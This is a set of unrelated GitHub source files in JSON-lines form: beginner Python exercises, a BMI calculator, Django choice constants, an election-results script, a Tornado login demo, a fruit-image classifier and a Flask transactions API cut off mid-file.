{"seq_id":"21221636354","text":"class Transformable1(object):\n    pass\n\n# does not work yet. Don't use.\n\nfrom implicit_vectorized import ImplicitFunctionVectorized\nimport numpy as np\nfrom basic_types import check_vector4_vectorized, make_vector4, check_vector4, check_scalar_vectorized, make_inverse\n\n#ImplicitFunctionVectorized3\nclass TwistZ(ImplicitFunctionVectorized, Transformable1):\n    \"\"\" Twists along the Z axis only, around Z axis.\n    To change this, apply a matrix and its reverse (a separate class)\n    Also see class @Transformed and @Screw.\"\"\"\n\n\n    def __init__(self, base_object, twist_rate):\n        \"\"\"twist_rate: # cycles per mm\n        \"\"\"\n        # axis_x0 is z always for now\n\n        self.lamda = np.pi*2*twist_rate\n        #if is_python3():\n        #    super().__init__(initialMatrix=m)\n        #else:\n        #    super(Transformed, self).__init__(initialMatrix=m)\n\n        assert issubclass(type(base_object), ImplicitFunctionVectorized)\n        self.base_object = base_object\n\n        #if m is None:\n        #    m = np.eye(4)\n        #check_matrix4(m)\n        #self.matrix = m.copy()\n        #self.invmatrix = make_inverse(m)\n\n        #m = np.eye(4)\n        #self.invmatrix = make_inverse(m)\n\n        assert isinstance(self.base_object, ImplicitFunctionVectorized)\n\n    def integrity_invariant(self):\n        return True\n\n    def implicitFunction(self, p):\n        check_vector4_vectorized(p)\n        # vec3.check_vector3_vectorized(p)\n        N = p.shape[0]\n        print(\"self.lamda\", self.lamda)\n        theta = p[:, 2] * self.lamda\n        print(theta.shape)\n        assert theta.shape == (N,)\n        ca = np.cos(theta)\n        sa = np.sin(theta)\n        print(theta.shape, \"theta\")\n        print(theta)\n\n        #aa = ca[:, np.newaxis]\n        #bb = p[:, 0, np.newaxis]\n        #cc = - sa[:, np.newaxis]\n        #dd = p[:, 1, np.newaxis]\n        #print aa.shape, \"aa\"\n        #print bb.shape, \"bb\"\n        #print cc.shape, \"cc\"\n        #print dd.shape, \"dd\"\n\n\n        #x1 = ca[:, np.newaxis]*p[:, 0] - sa[:, np.newaxis]*p[:, 1]\n        #x1 = aa*bb # +cc*dd\n\n        p2 = np.concatenate((\n            ca[:, np.newaxis]*p[:, 0, np.newaxis] - sa[:, np.newaxis]*p[:, 1, np.newaxis],\n            sa[:, np.newaxis]*p[:, 0, np.newaxis] + ca[:, np.newaxis]*p[:, 1, np.newaxis],\n            p[:, 2, np.newaxis],  # z\n            p[:, 3, np.newaxis]  # 1.\n            ), axis=1)\n\n        v = self.base_object.implicitFunction(p2)\n        check_scalar_vectorized(v)\n        return v\n\n        #cs = np.concatenate((ca[:, 
np.newaxis], sa[:, np.newaxis]), axis=1)\n        #assert cs.shape == (N, 2)\n        # Nx2x2\n        #cs_4 = np.concatenate( (\n        #    ca[:, np.newaxis],\n        #    -sa[:, np.newaxis],\n        #    sa[:, np.newaxis],\n        #    ca[:, np.newaxis]\n        #    ), axis=1)\n        assert cs_4.shape == (N, 4)\n        cs_2x2 = cs_4.reshape(N, 2, 2) #contains the reverse rotation matrix\n        assert cs_2x2.shape == (N, 2, 2)\n        #xy = np.dot(cs_2x2, p[:, 0:2])\n        #assert xy.shape == (N, 2)\n        p2 = p.copy()\n        #p2[:, 0:2] = np.dot(cs_2x2, p[:,0:2])\n        #m = np.tensordot(cs_2x2, p[:, 0:2], axes=(2, 1))\n\n        #np.sum(a*b, axis=1)\n\n        print(\"m.shape\", m.shape)\n        p2[:, 0:2] = m\n\n        v = self.base_object.implicitFunction(p2)\n        check_scalar_vectorized(v)\n        return v\n\n    #def implicitGradient(self, p): # -> Vector3D :\n    #check_vector4_vectorized(p)\n    #tp = np.dot(self.invmatrix, vec3.make_v4(np.transpose(p)))\n    #tp = np.transpose(tp)\n    #g = self.base_object.implicitGradient(tp)\n    #check_vector4_vectorized(g)\n    # #g[:, 3] = 0 # important\n    #v4 = np.dot(np.transpose(self.invmatrix), vec3.make_v4(np.transpose(g)))\n    #v4 = np.transpose(v4) # not efficient\n    # #v4[:, 3] = 1\n    #check_vector4_vectorized(v4)\n    #return v4\n\n    def implicitGradient__(self, p): # -> Vector3D :\n        check_vector4_vectorized(p)\n        p = np.concatenate((p, np.ones((p.shape[0], 1))), axis=1)\n        tp = np.dot(self.invmatrix, np.transpose(p))\n        tp = np.transpose(tp)\n        #tp = tp[:, :3]\n        g = self.base_object.implicitGradient(tp)\n\n        check_vector4_vectorized(g)\n\n        g = np.concatenate((g, np.ones((g.shape[0], 1))), axis=1)\n        v4 = np.dot(np.transpose(self.invmatrix), (np.transpose(g)))\n        v4 = np.transpose(v4)\n        #v3 = v4[:, :3]\n\n        check_vector4_vectorized(v4)\n        return v4\n\n    def hessianMatrix(self, p):\n        #warning: not tested\n        check_vector4_vectorized(p)\n        #tp = np.dot(self.invmatrix, vec3.make_v4(np.transpose(p)))\n        #tp = np.transpose(tp)\n\n        h1 = self.base_object.hessianMatrix(tp)\n        #h = np.dot(h1, self.invmatrix) # which one is correct?\n        #h = np.dot(self.invmatrix, vec3.make_v4(np.transpose(h1))) # which one is correct?\n        raise NotImplementedError()\n        return h\n\n\n__all__ = ['TwistZ', 'Transformable1']\n","repo_name":"sohale/implisolid","sub_path":"python_implicit/twist_z.py","file_name":"twist_z.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"}
{"seq_id":"17606028792","text":"from warnings import warn\nfrom typing import Tuple\nimport pandas as pd\nfrom bmi_calculator.settings import JSON_INPUT_PATH, JSON_OUTPUT_PATH, BMI_RANGES, BMI_HEALTH_RISK\n\n\ndef calculate_bmi(weight: int, height: int) -> float:\n    \"\"\"\n    calculate BMI given weight in kgs and height in cms\n    :param weight: weight in kgs\n    :param height: height in cms\n    :return: BMI\n    \"\"\"\n    if weight <= 0:\n        warn(\"Weight must be a positive value.\")\n        return None\n    elif height <= 0:\n        warn(\"Height must be a positive value.\")\n        return None\n    else:\n        return round(float(weight) * 10000 / height ** 2, 1)\n\n\ndef get_bmi_range(bmi: float) -> str:\n    \"\"\"\n    get the BMI range associated to the BMI value using the settings dict giving the match\n    :param bmi: BMI value\n    :return: BMI range\n    \"\"\"\n    for bmi_range in BMI_RANGES:\n        if bmi <= bmi_range[\"BMI upper limit\"]:\n            return bmi_range[\"BMI Category\"]\n    return None\n\n\ndef add_bmi_range(data_pd: pd.DataFrame) -> pd.DataFrame:\n    \"\"\"\n    add to the given pandas dataframe a \"bmi\" column containing BMI values, a column with the BMI range and a column\n    with the associated health risk\n    :param data_pd: 
input dataframe with \"bmi\" column\n :return: output dataframe with 'BMICategory' and 'BMICategory' columns added\n \"\"\"\n result_pd = data_pd.copy()\n result_pd[\"bmi\"] = result_pd.apply(lambda r: calculate_bmi(r.WeightKg, r.HeightCm), axis=1)\n result_pd[\"BMICategory\"] = result_pd[\"bmi\"].map(get_bmi_range)\n result_pd[\"HealthRisk\"] = result_pd[\"BMICategory\"].map(BMI_HEALTH_RISK)\n return result_pd\n\n\ndef main():\n \"\"\"\n read patients data from a json file\n add \"bmi\", 'BMICategory' and 'BMICategory' columns\n display the number of overweight people\n write resulting table in a json file\n \"\"\"\n data_pd = pd.read_json(JSON_INPUT_PATH)\n data_pd = add_bmi_range(data_pd)\n print(f\"Number of overweight people : {(data_pd['BMICategory'] == 'Overweight').sum()}\")\n data_pd.to_json(JSON_OUTPUT_PATH, orient='records')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yasshass/code-20211128-mohamedyassinehassairi","sub_path":"bmi_calculator/calculate_bmi.py","file_name":"calculate_bmi.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33977108434","text":"\n\nSEXO_CHOICE = (\n ('M','Masculino'),\n ('F','Femenino'),\n )\nTIPO_DOC = (\n ('DNI','DNI'),\n ('CI','Cedula de Identidad'),\n ('LE','Libreta de Enrolamiento'),\n ('LC','Libreta Civica'),\n )\n\"\"\"\nDIA_CHOICES = (\n ('LUN', 'Lunes'),\n ('MAR','Martes'),\n ('MIE','Miercoles'),\n ('JUE','Jueves'),\n ('VIE','Viernes'),\n ('SAB','Sabado'),\n \n )\n\"\"\"\nDIA_CHOICES = (\n (0, 'Lunes'),\n (1,'Martes'),\n (2,'Miercoles'),\n (3,'Jueves'),\n (4,'Viernes'),\n (5,'Sabado'),\n \n )\n\nESTADO_CIVIL_CHOICE = (\n ('-', 'No Definido'),\n ('S', 'Soltero'),\n ('C', 'Casado'),\n ('V', 'Viudo'),\n ('D', 'Divorciado'),\n)\n\n\nGRUPO_SANGUINEO_CHOICE = (\n (\"O+\", \"O+\"),\n (\"O-\",\"O-\"),\n (\"A+\",\"A+\"),\n (\"A-\",\"A-\"),\n (\"B+\",\"B+\"),\n (\"B-\",\"B-\"),\n (\"AB+\",\"AB+\"),\n (\"AB-\",\"AB-\"),\n)\n\n\nTIPOS_PRACTICAS_CHOICES =( (\"ANC\",\"Analisis Clinicos\"),\n (\"QUI\",\"Quirurgicas\"),\n (\"ODO\",\"Odontologicas\"),\n (\"ESP\",\"Especializadas\"),\n )\n\nTIPOS_ESTADOS_PRACTICAS =( (\"Pendiente\",\"Pendiente\"),\n (\"Realizado\",\"Realizado\"),\n (\"Finalizado\",\"Finalizado\"),\n (\"Anulado\",\"Anulado\"),\n \n )\n\n\nTIPOS_ESTADOS_RECETA = ( (\"Activo\",\"Activo\"),\n (\"Anulado\",\"Anulado\"),\n \n \n )\nTIPOS_ESTADOS_TURNOS = ( (\"Presente\",\"Presente\"), \n (\"Ausente\",\"Ausente\"), \n )\n\nMESES =['01','02','03','04','05','06','07','08','09','10','11','12',]\n","repo_name":"P3NNYWISE/Seminario","sub_path":"Seminario/apps/tipos.py","file_name":"tipos.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74018278508","text":"print('='*30)\nprint('{:30}'.format('BANCO CEV'))\nprint('='*30)\nvalor = int(input('Que valor você quer sacar? 
R$'))\ntot = valor\ncéd = 50\ntotcéd = 0\nwhile True:\n    if tot >= céd:\n        tot -= céd\n        totcéd += 1\n    else:\n        if totcéd > 0:\n            print(f'Total de {totcéd} cédulas de R${céd}')\n        if céd == 50:\n            céd = 20\n        elif céd == 20:\n            céd = 10\n        elif céd == 10:\n            céd = 1\n        totcéd = 0\n    if tot == 0:\n        break\nprint('='*30)\nprint('Volte Sempre!')\n\n\n","repo_name":"Leownhart/My_Course_of_python","sub_path":"Exercicios/ex071.py","file_name":"ex071.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"36679151659","text":"import math\n\ndef primenumbers(L):\n    notprimes = set()\n    primes = []\n    for counter in range(2,L):\n        if counter in notprimes: \n            continue\n        \n        for j in range(counter*counter,L+1,counter):\n            notprimes.add(j)\n        \n        primes.append(counter)\n    return primes \n    \npriem = primenumbers(1000000)\n\ndef dis(n,c):\n    count = 0\n    for p in priem:\n        if n / p == int(n/p):\n            count += 1\n        if count == c:\n            return True\n    return False\n    \ndef fourdis(n,x,c):\n    count = 0\n    for i in range(n,x+n):\n        if(dis(i,c) == True):\n            count += 1\n            if(count == c):\n                return True\n        else:\n            count = 0\n    return False\nprint(fourdis(600,200,3))","repo_name":"CasperHagenaars/WISB256","sub_path":"Euler Challenge/Euler47.py","file_name":"Euler47.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"73534811627","text":"import numpy as np\nimport cv2\nfrom tensorflow.keras.models import load_model\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nmodel = load_model('vgg19_mydataset_240_320.h5')\n\nimage_gen = ImageDataGenerator()\ntrain_image_gen = image_gen.flow_from_directory('my_fruits_dataset',\n                                               target_size=(240,320),\n                                               color_mode='rgb',\n                                               batch_size=32,\n                                               class_mode='categorical')\n\ndef predict_image(my_image):\n    my_image = cv2.cvtColor(my_image, cv2.COLOR_BGR2RGB)\n    my_image = tf.image.resize_with_pad(my_image, 240, 320)\n    my_image = np.array(my_image)\n    my_image = my_image/255\n    my_image = np.expand_dims(my_image, axis=0)\n    result = model.predict_classes(my_image)\n\n    class_names = train_image_gen.class_indices\n    result_class = list(class_names.keys())[list(class_names.values()).index(result)]\n    score = float(\"%0.2f\" % (max(model.predict(my_image)[0]) * 100))\n\n    return result_class, score\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n    ret, frame = cap.read()\n    cv2.imshow('frame',frame)\n\n    k = cv2.waitKey(10)\n    if k == 32:\n        print(predict_image(frame))\n\n    if k & 0xFF == ord('q'):\n        break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"kacperskoczek/fruit_recognition","sub_path":"mycamera.py","file_name":"mycamera.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"23304514600","text":"# import csv\n#\n# with open('data.csv', newline='') as f:\n#     reader = csv.reader(f)\n#     for row in reader:\n#         print(row)\n\nimport pandas as pd\nimport os\n\n\ndef read_csv(file):\n    df = pd.read_csv(file)\n    var = df['no']\n    for i in var:\n        print(i)\n\n\ndef list_dir(my_dir):\n    for file in os.listdir(my_dir):\n        if file.endswith(\".csv\"):\n            # print(os.path.join(\"/media/mrrobot/ACADEMIC/pycharm Projects/csv reader\", file))\n            print(file)\n            read_csv(file)\n\n\nif __name__ == \"__main__\":\n    my_dir = \"/media/mrrobot/ACADEMIC/pycharm 
Projects/csv reader\"\n list_dir(my_dir)","repo_name":"sathishkumar95/assignment","sub_path":"myfiles/csv reader.py","file_name":"csv reader.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8655457798","text":"# how to call class methods using the class name or an instance of the class\n\nimport random\n\n\nclass Teacher:\n\n groups = [\"Group 1\", \"Group 2\", \"Group 3\", \"Group 4\"]\n # decorator\n\n @classmethod\n def sort(cls, name):\n print(name, \"is in\", random.choice(cls.groups))\n\n\n# calling a class method using class name\nTeacher.sort(\"Melvin\")\n\n\nteacher = Teacher()\n# calling a class method using an instance of our class\nteacher.sort(\"Eunice\")\nprint(teacher.groups)\n\n# The class acts as a container for the functionality tteacher we need.\n","repo_name":"MelvinMbae/class-attributes-methods-group3","sub_path":"grouping-classmethods.py","file_name":"grouping-classmethods.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33833013140","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2018-11-18\n# @Author : flying\n\nimport tornado.ioloop\nimport tornado.web\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n print(111)\n u = self.get_argument('user')\n e = self.get_argument('email')\n p = self.get_argument('pwd')\n if u == 'flying' and e == 'flying@qq.com' and p == '1223':\n self.write(\"OK\")\n else:\n self.write(\"滚\")\n self.write(\"GET\")\n def post(self, *args, **kwargs):\n print(123)\n u = self.get_argument('user')\n e = self.get_argument('email')\n p = self.get_argument('pwd')\n if u == 'flying' and e == 'flying@qq.com' and p == '1223':\n self.write(\"OK\")\n else:\n self.write(\"滚\")\n self.write('POST')\n\napplication = tornado.web.Application([\n (r\"/index\",MainHandler)\n])\n\nif __name__ == \"__main__\":\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()","repo_name":"flying1223/old_boy_git","sub_path":"old boy/day14/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13582174035","text":"from scipy.spatial import Voronoi, voronoi_plot_2d\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nDIMENSION = 3\n\ndef init_index():\n index = [i + DIMENSION *\n j for j in range(DIMENSION) for i in range(DIMENSION)]\n return index\n\n\n# Punti utente scelti\nuser_points = np.array([(0, 0), (2,3)])\n\n# # Punti sulla griglia\nx_range = np.arange(0, 5)\ny_range = np.arange(0, 5)\ngrid_points = np.array([(x, y) for x in x_range for y in y_range])\n\n# starttime=time.time()\n# # Calcola le assegnazioni di Voronoi\n# vor = Voronoi(user_points)\n\n# # Trova il punto utente più vicino a ciascun punto sulla griglia\nassignments = []\nfor grid_point in grid_points:\n min_distance = float('inf')\n nearest_user_point = None\n for i, user_point in enumerate(user_points):\n distance = np.linalg.norm(grid_point - user_point)\n if distance < min_distance:\n min_distance = distance\n nearest_user_point = i\n assignments.append(nearest_user_point)\n\n# duration = time.time() - starttime\n# print(f\"Time: {duration} s\")\n# # Disegna le celle di Voronoi e i punti sulla griglia\n# voronoi_plot_2d(vor)\n# plt.scatter(grid_points[:, 0], grid_points[:, 1],\n# c=assignments, 
cmap='viridis', marker='.')\n# plt.scatter(user_points[:, 0], user_points[:, 1], c='red', marker='o')\n# plt.xlim(0, 127)\n# plt.ylim(0, 127)\n# plt.gca().set_aspect('equal', adjustable='box')\n# plt.show()\n\nprint(assignments)","repo_name":"FedericoCantarelli/bvclassificator","sub_path":"code/bvclustering/voronoi_prova.py","file_name":"voronoi_prova.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73564368106","text":"# To be used with PyInstaller\n# Command line: pyinstaller pyinstaller_setup_dl_sdks_onefile.spec\na = Analysis(['dl_sdks_exe.py'],\n hiddenimports=['platform'],\n runtime_hooks=None)\n\n# Remove specific binaries\na.binaries = a.binaries - TOC([\n ('sqlite3.dll', '', ''),\n ('_hashlib', '', ''),\n ('_sqlite3', '', '')])\n \n# Remove clashing dependency duplicate \nfor d in a.datas:\n\tif 'pyconfig' in d[0]: \n\t\ta.datas.remove(d)\n\t\tbreak\n\t\t\t\t\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n name='download_sdks.exe',\n debug=False,\n strip=None,\n upx=True,\n console=True,\n)\n","repo_name":"HanetakaChou/CryEngine-5.2.3","sub_path":"Tools/sdk_dl_exe/pyinstaller_setup_dl_sdks_onefile.spec","file_name":"pyinstaller_setup_dl_sdks_onefile.spec","file_ext":"spec","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"40575320602","text":"fruits = ['apple', 'banana', 'pear']\n\nrandom_list = ['Kaykay', 24, ['watermelon', 'pawpaw'], fruits]\n\n# print(random_list)\n\n# print(fruits)\n\n# new_fruit = input(\"Put your new fruit: \")\n\n# fruits[0] = new_fruit\n\n# random_list[2][0] = input(\"Put your newest fruit: \")\n\n# print(random_list)\n\n# new_fruit = input(\"Your new fruit: \")\n\n# fruits.append(new_fruit)\n# fruits.append('cherry')\n\n\nfruits.insert(0, 'orange')\n\n# print(fruits)\n\nto_do_list = ['wash plates', 'learn python', 'read book']\n\n# print(to_do_list)\n\n\n# task = input(\"What is the task: \")\n# position = int(input(\"What position do you want it added: \"))\n\n# to_do_list.insert(position-1, task)\n\n# print(to_do_list)\n\n# to_do_list.pop(1)\n\n# to_do_list.remove(\"learn python\")\n\n# to_do_list.clear()\n\n# del to_do_list\n\n# print(to_do_list)\n\ndef sum_all(*numbers):\n\ttotal = 0\n\n\tfor i in numbers:\n\t\ttotal+=i\n\t\t\n\tprint(total)\n\n\nsum_all(1,2,3,4,5,6,7)","repo_name":"nodebe/ItechforBootcamp","sub_path":"python_list2.py","file_name":"python_list2.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28035097495","text":"####################################################################################\r\n# ######### PyPoll.py analyzes Colorado election results from a csv file to #######\r\n# ######### give the total votes, county-wise votes, candidate-wise votes #######\r\n# ######### and vote%, as well as the largest county turnout and the winner #######\r\n####################################################################################\r\n\r\n# Add dependencies\r\nimport csv\r\nimport os\r\n\r\n# Assign a variable to load a file from a path\r\nfile_to_load = os.path.join(\"Resources/election_results.csv\")\r\n\r\n# Assign a variable to save the file to a path\r\nfile_to_write = os.path.join(\"analysis\", \"election_analysis.txt\")\r\n\r\n#######################################################\r\n# 
Initialize variables, arrays & Dictionaries\r\n#######################################################\r\n\r\n# A total vote counter\r\ntotal_votes=0\r\n\r\n# Candidate options and candidate votes\r\ncandidate_names=[]\r\ncandidate_votes={}\r\n\r\n# County options and county votes\r\ncounty_names=[]\r\ncounty_votes={}\r\n\r\n# Track the winning candidate, vote count, and percentage\r\nwinning_name=\"\"\r\nwinning_votes=0\r\nwinning_percent=0\r\n\r\n# Track the winning county, and vote count\r\nwinning_county=\"\"\r\nwinning_county_votes=0\r\n\r\n#######################################################\r\n\r\n# Open the election results and read the file\r\n\r\nwith open(file_to_load,'r') as file_read:\r\n file_data=csv.reader(file_read)\r\n \r\n # Read and skip the header row\r\n headers=next(file_data)\r\n\r\n # Read each data row of the file\r\n for row in file_data:\r\n # Add to the total vote count\r\n total_votes += 1\r\n\r\n # Get the candidate and county name from each row\r\n candidate=row[2]\r\n county=row[1]\r\n\r\n # If the candidate does not match any existing candidate add it the\r\n # the candidate list\r\n if candidate not in candidate_names:\r\n # Add the candidate name to the candidate list\r\n candidate_names.append(candidate)\r\n # And begin tracking that candidate's voter count\r\n candidate_votes[candidate]=0\r\n \r\n # If the county does not match any existing county add it the\r\n # the county list\r\n if county not in county_names:\r\n # Add the county name to the county list\r\n county_names.append(county)\r\n # Begin tracking the county's voter count\r\n county_votes[county]=0\r\n \r\n # Add a vote to that candidate's and county's count\r\n candidate_votes[candidate]+=1\r\n county_votes[county]+=1\r\n\r\n# Create message to write/print to results file. 
Print Total Vote count\r\nmsg_to_prn=(\r\n    f\"\\nElection Results\\n\"\r\n    f\"-------------------------\\n\"\r\n    f\"Total Votes: {total_votes:,}\\n\"\r\n    f\"-------------------------\\n\\n\"\r\n    f\"County Votes:\\n\"\r\n    )\r\n\r\n# Retrieve vote count and percentage for each county\r\nfor cnt in county_votes:\r\n    cvotes=county_votes[cnt]\r\n    cpercent=(cvotes/total_votes)*100\r\n    \r\n    # Check if the county has the largest turnout\r\n    if cvotes>winning_county_votes:\r\n        winning_county_votes=cvotes\r\n        winning_county=cnt\r\n    # Print each county, their voter count, and percentage\r\n    msg_to_prn+=(f\"{cnt}: {cpercent:.1f}% ({cvotes:,})\\n\")\r\n\r\n# Print the largest turnout county name\r\nmsg_to_prn += (f\"\\n-------------------------------------\\n\")\r\nmsg_to_prn += (f\"Largest County Turnout: {winning_county}\\n\")\r\nmsg_to_prn += (f\"-------------------------------------\\n\")\r\n\r\nfor c in candidate_votes:\r\n    votes=candidate_votes[c]\r\n    percent=(votes/total_votes)*100\r\n    \r\n    # Check if the candidate has the highest number and % of votes and is the winner\r\n    if votes>winning_votes and percent>winning_percent:\r\n        winning_votes=votes\r\n        winning_percent=percent\r\n        winning_name=c\r\n    # Print each candidate, their voter count, and percentage\r\n    msg_to_prn+=(f\"{c}: {percent:.1f}% ({votes:,})\\n\")\r\n\r\n# Print the winning candidate's results\r\nmsg_to_prn += (f\"-------------------------------------\\n\")\r\nmsg_to_prn += (f\"Winner: {winning_name}\\n\")\r\nmsg_to_prn += (f\"Winning Vote Count: {winning_votes:,}\\n\")\r\nmsg_to_prn += (f\"Winning Percentage: {winning_percent:.1f}%\\n\")\r\nmsg_to_prn += (f\"-------------------------------------\\n\")\r\n\r\n# Print results to the terminal\r\nprint(msg_to_prn)\r\n\r\n# Save the results in a text file\r\nwith open(file_to_write,'w') as results_file:\r\n    results_file.write(msg_to_prn)\r\n\r\n########################### End of Code ######################################","repo_name":"ruchis2712/Election_Analysis","sub_path":"PyPoll.py","file_name":"PyPoll.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22634849861","text":"class Solution:\n    def replaceElements(self, arr: List[int]) -> List[int]:\n        length = len(arr)\n        max_val = arr[length-1]\n        arr[length-1] = -1\n        for i in range(length-2,-1,-1):\n            temp = arr[i]\n            arr[i]=max_val \n            if max_val< temp:\n                max_val=temp\n        return arr","repo_name":"jealsab/Competitive-Programming","sub_path":"1299-replace-elements-with-greatest-element-on-right-side/1299-replace-elements-with-greatest-element-on-right-side.py","file_name":"1299-replace-elements-with-greatest-element-on-right-side.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"13950717581","text":"'''\ncomb_sort.py\n\nImproves on bubble sort by using a gap sequence to remove turtles.\n\n\nhttps://en.wikipedia.org/wiki/Comb_sort\n'''\n\ndef comb_sort(seq):\n    '''\n    :param seq: A list of integers\n    :rtype: A list of integers\n    '''\n\n    gap = len(seq)\n    swap = True\n\n    while gap > 1 or swap:\n        gap = max(1, int(gap / 1.25))\n        swap = False\n        for i in range(len(seq) - gap):\n            #print(seq)\n            if seq[i] > seq[i + gap]:\n                seq[i], seq[i + gap] = seq[i + gap], seq[i]\n                swap = True\n    return seq\n\n\nif __name__ == '__main__':\n    unordered_integers = [8, 15, 23, 42, 4, 16]\n    ordered_integers = comb_sort(unordered_integers)\n    print('comb_sort result: 
{}'.format(ordered_integers))\n","repo_name":"garigari-kun/mynotes","sub_path":"src/algorithms/comb_sort.py","file_name":"comb_sort.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"9967510840","text":"\"\"\"\n371. Sum of Two Integers\nGiven two integers a and b,\nreturn the sum of the two integers without using the operators + and -.\nExample 1:\nInput: a = 1, b = 2\nOutput: 3\nExample 2:\nInput: a = 2, b = 3\nOutput: 5\n\n\"\"\"\nclass Solution:\n    def getSum(self, a: int, b: int) -> int:\n        # count a unit marks plus b unit marks; works for non-negative inputs\n        lst = []\n        for i in range(a):\n            lst.append(1)\n        for j in range(b):\n            lst.append(1)\n        return len(lst)\n# a = 1\n# b = 2\na = 2\nb = 3\ns1=Solution()\nprint(s1.getSum(a,b))\n","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_27_jan_2022/leetcode_371_Sum_of_Two_Integers.py","file_name":"leetcode_371_Sum_of_Two_Integers.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"25135070301","text":"from django.contrib import admin\nfrom .models import Order,OrderItems\n# Register your models here.\n\nclass OrderAdmin(admin.ModelAdmin):\n    model = Order\n\nclass ItemAdmin(admin.ModelAdmin):\n    model = OrderItems\n\nadmin.site.register(Order,OrderAdmin)\nadmin.site.register(OrderItems,ItemAdmin)\n","repo_name":"hrharish111/FirstPizzaAppMoberries","sub_path":"orderApp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"34567867336","text":"from flask_restx import Namespace, fields\nfrom flask import request\nfrom prod.api.base_resource import BaseResource\nfrom prod.db_models.user_db_model import UserDBModel\nfrom prod.db_models.user_project_db_model import UserProjectDBModel\nfrom prod.db_models.transactions_db_model import TransactionsDBModel\nfrom prod.exceptions import BusinessError, InvalidTransitionAmount\nfrom prod.schemas.user_representation import user_representation\nfrom prod.exceptions import UserBlockedError, InvalidTransitionType\nfrom prod.schemas.user_repeated import user_repeated\nfrom prod.schemas.constants import MISSING_VALUES_ERROR, REPEATED_USER_ERROR\nfrom prod.schemas.constants import INVALID_TOKEN\n\nns = Namespace(\n    name='transactions',\n    description='All user transactions related operations'\n)\n\n\n@ns.route('')\nclass UsersTransactionListResource(BaseResource):\n\n    REGISTER_FIELDS = (\"user_id\", \"project_id\", \"amount\", \"type\", \"token\")\n\n    code_status = {\n        UserBlockedError: (406, 'user_blocked')\n    }\n\n    body_swg = ns.model(user_representation.name, user_representation)\n\n    code_20x_swg = ns.model('All transactions input 20x', {\n        'transaction_id': fields.Integer(description='The transaction id'),\n        'user_id': fields.Integer(description=('The user id associated with '\n                                               'the transaction')),\n        'projects_id': fields.Integer(description=('The project id associated '\n                                                   'with the transaction')),\n        'amount': fields.Integer(description='The amount of the transaction'),\n        'type': fields.String(description='The type of the transaction')\n    })\n\n    code_400_swg = ns.model(user_repeated.name, user_repeated)\n\n    code_409_swg = ns.model('UserOutput409', {\n        'status': fields.String(example=REPEATED_USER_ERROR)\n    })\n\n    @ns.response(200, 'Success', fields.List(fields.Nested(code_20x_swg)))\n    def get(self):\n        \"\"\"Get all 
